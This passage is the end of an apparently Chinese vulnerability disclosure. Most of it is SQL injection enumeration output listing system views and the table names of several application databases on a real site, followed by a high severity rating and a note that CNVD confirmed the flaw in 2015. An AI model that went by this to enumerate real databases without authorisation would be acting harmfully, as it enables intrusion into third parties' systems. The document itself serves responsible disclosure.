sys.dm_tran_locks || sys.dm_tran_session_transactions || sys.dm_tran_top_version_generators || sys.dm_tran_transactions_snapshot || sys.dm_tran_version_store || sys.endpoint_webmethods || sys.endpoints || sys.event_notification_event_types || sys.event_notifications || sys.events || sys.extended_procedures || sys.extended_properties || sys.filegroups || sys.foreign_key_columns || sys.foreign_keys || sys.fulltext_catalogs || sys.fulltext_document_types || sys.fulltext_index_catalog_usages || sys.fulltext_index_columns || sys.fulltext_indexes || sys.fulltext_languages || sys.http_endpoints || sys.identity_columns || sys.index_columns || sys.indexes || sys.internal_tables || sys.key_constraints || sys.key_encryptions || sys.linked_logins || sys.login_token || sys.master_files || sys.master_key_passwords || sys.message_type_xml_schema_collection_usages || sys.messages || sys.module_assembly_usages || sys.numbered_procedure_parameters || sys.numbered_procedures || sys.objects || sys.openkeys || sys.parameter_type_usages || sys.parameter_xml_schema_collection_usages || sys.parameters || sys.partition_functions || sys.partition_parameters || sys.partition_range_values || sys.partition_schemes || sys.partitions || sys.plan_guides || sys.procedures || sys.remote_logins || sys.remote_service_bindings || sys.routes || sys.schemas || sys.securable_classes || sys.server_assembly_modules || sys.server_event_notifications || sys.server_events || sys.server_permissions || sys.server_principals || sys.server_role_members || sys.server_sql_modules || sys.server_trigger_events || sys.server_triggers || sys.servers || sys.service_broker_endpoints || sys.service_contract_message_usages || sys.service_contract_usages || sys.service_contracts || sys.service_message_types || sys.service_queue_usages || sys.service_queues || sys.services || sys.soap_endpoints || sys.sql_dependencies || sys.sql_logins || sys.sql_modules || sys.stats_columns || sys.stats_columns || sys.symmetric_keys || sys.synonyms || sys.sysaltfiles || sys.syscacheobjects || sys.syscharsets || sys.syscolumns || sys.syscomments || sys.sysconfigures || sys.sysconstraints || sys.syscurconfigs || sys.syscursorcolumns || sys.syscursorrefs || sys.syscursors || sys.syscursortables || sys.sysdatabases || sys.sysdepends || sys.sysdevices || sys.sysfilegroups || sys.sysfiles || sys.sysforeignkeys || sys.sysfulltextcatalogs || sys.sysindexes || sys.sysindexkeys || sys.syslanguages || sys.syslockinfo || sys.syslogins || sys.sysmembers || sys.sysmessages || sys.sysobjects || sys.sysoledbusers || sys.sysopentapes || sys.sysperfinfo || sys.syspermissions || sys.sysprocesses || sys.sysprotects || sys.sysreferences || sys.sysremotelogins || sys.syssegments || sys.sysservers || sys.system_columns || sys.system_components_surface_area_configuration || sys.system_internals_allocation_units || sys.system_internals_partition_columns || sys.system_internals_partitions || sys.system_objects || sys.system_parameters || sys.system_sql_modules || sys.system_views || sys.systypes || sys.sysusers || sys.tables || sys.tcp_endpoints || sys.trace_categories || sys.trace_columns || sys.trace_event_bindings || sys.trace_events || sys.trace_subclass_values || sys.traces || sys.transmission_queue || sys.trigger_events || sys.triggers || sys.type_assembly_usages || sys.types || sys.user_token || sys.via_endpoints || sys.views || sys.xml_indexes || sys.xml_schema_attributes || sys.xml_schema_collections || sys.xml_schema_component_placements || sys.xml_schema_components || sys.xml_schema_elements || sys.xml_schema_facets || sys.xml_schema_model_groups || sys.xml_schema_namespaces || sys.xml_schema_types || sys.xml_schema_wildcard_namespaces || sys.xml_schema_wildcards |+---------------------------------------------------+Database: ZY_PMSS[38 tables]+---------------------------------------------------+| AreaCN || AreaDetailCN || CMS_Class || CMS_Contents || CMS_Critic || CMS_Docs || MsgBoard || MsgBoardReply || Organization || P_BaseInfo || P_ChildInfo || SYS_Function || SYS_Log || SYS_Msg || SYS_Params || SYS_PhotoClass || SYS_Photos || SYS_RolesFunction || SYS_RolesFunction || SYS_Services || SYS_UserRoles || SiteLink || USER_BaseInfo || dtproperties || v_CmsClass || v_CmsContents || v_CmsList || v_DocsList || v_FilePath || v_MsgBoardList || v_Organizations || v_PersonBaseInfo || v_SysLogs || v_SysMsg || v_SysPhotoClass || v_SysPhotos || v_UserList || v_UserRolesPower |+---------------------------------------------------+Database: ZY_FileTrans[66 tables]+---------------------------------------------------+| AreaCN || CMS_Class || CMS_Contents || CMS_Critic || CMS_IncDocs || CMS_ShareUsers || CMS_Templates || SYS_Function || SYS_Log || SYS_MissionBill || SYS_MissionDocs || SYS_Msg || SYS_Params || SYS_PhotoClass || SYS_Photos || SYS_QueueSvrs || SYS_RolesFunction || SYS_RolesFunction || SYS_Seal || SYS_UserRoles || SiteLink || USER_AddressList || USER_Archives || USER_Asset || USER_Attend || USER_AttendSet || USER_BaseInfo || USER_Department || USER_PR_List || USER_Schedule || USER_WorkLog || UserHD_Directory || UserHD_Files || WorkFlowLogs || WorkFlowNames || WorkFlowNodes || dtproperties || v_Arrangement || v_CMSAsset || v_CMSContentsDetail || v_CMSContentsDetail || v_CMSContentsImg || v_CMSContentsList || v_CMSCritics || v_CMSPhotos || v_CMS_Templates || v_DocsList || v_FilePath || v_MissionBill || v_PR_List || v_SYS_Seal || v_ScheduleState || v_SysLogs || v_SysMsg || v_SysPhotoClass || v_SysPhotos || v_UserArchives || v_UserAttend || v_UserClientInfo || v_UserHD_Directory || v_UserHD_Files || v_UserList || v_UserRolesPower || v_UserSchedules || v_UserWorkLogs || v_WorkFlows |+---------------------------------------------------+Database: ZY_IPS[69 tables]+---------------------------------------------------+| AreaCN || CMS_Class || CMS_Contents || CMS_Critic || CMS_IncDocs || CMS_ShareUsers || SYS_AssetsOut || SYS_AssetsOut || SYS_Customer_PR || SYS_Customer_PR || SYS_Function || SYS_Log || SYS_MissionDocs || SYS_MissionDocs || SYS_MissionDocs || SYS_Msg || SYS_Params || SYS_PhotoClass || SYS_Photos || SYS_RolesFunction || SYS_RolesFunction || SYS_UserRoles || SiteLink || USER_AddressList || USER_Archives || USER_Attend || USER_AttendSet || USER_BaseInfo || USER_Department || USER_Schedule || USER_WorkLog || USER_WorkLogView || UserHD_Directory || UserHD_Files || WorkFlowLogs || WorkFlowNames || WorkFlowNodes || dtproperties || v_Arrangement || v_AssetsOut || v_CMSAsset || v_CMSContentsDetail || v_CMSContentsDetail || v_CMSContentsImg || v_CMSContentsList || v_CMSCritics || v_CMSPhotos || v_CustomerInfo || v_DocsList || v_FilePath || v_MissionDo || v_Missions || v_PR_List || v_ScheduleState || v_SysLogs || v_SysMsg || v_SysPhotoClass || v_SysPhotos || v_UserArchives || v_UserAttend || v_UserHD_Directory || v_UserHD_Files || v_UserList || v_UserRolesPower || v_UserRolesPower || v_UserSchedules || v_UserWorkLogs || v_WorkFlows || v_WorkLogViewUser |+---------------------------------------------------+
过滤。。
危害等级:高
漏洞Rank:15
确认时间:2015-03-17 11:26
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给陕西分中心,由陕西分中心后续协调网站管理单位处置。
暂无